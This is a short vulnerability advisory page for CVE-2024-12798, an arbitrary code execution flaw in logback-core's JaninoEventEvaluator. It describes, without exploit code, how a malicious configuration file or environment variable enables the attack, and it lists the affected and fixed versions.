logback-core JaninoEventEvaluator Arbitrary Code Execution Vulnerability
CVE-2024-12798 Published on December 19, 2024
JaninoEventEvaluator vulnerability
ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core
upto including version 0.1 to 1.3.14 and 1.4.0 to 1.5.12 in Java applications allows
attacker to execute arbitrary code by compromising an existing
logback configuration file or by injecting an environment variable
before program execution.
Malicious logback configuration files can allow the attacker to execute
arbitrary code using the JaninoEventEvaluator extension.
A successful attack requires the user to have write access to a
configuration file. Alternatively, the attacker could inject a malicious
environment variable pointing to a malicious configuration file. In both
cases, the attack requires existing privilege.
Weakness Type
What is an EL Injection Vulnerability?
The software constructs all or part of an expression language (EL) statement in a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.
CVE-2024-12798 has been classified to as an EL Injection vulnerability or weakness.
Products Associated with CVE-2024-12798
Want to know whenever a new CVE is published for Oracle? stack.watch will email you.
Affected Versions
QOS.CH Sarl Logback-core:- Version 0.1, <= 1.3.14 is affected.
- Version 1.4.0, <= 1.5.12 is affected.
- Version 1.3.15 is unaffected.
- Version 1.5.13 is unaffected.
Exploit Probability
EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.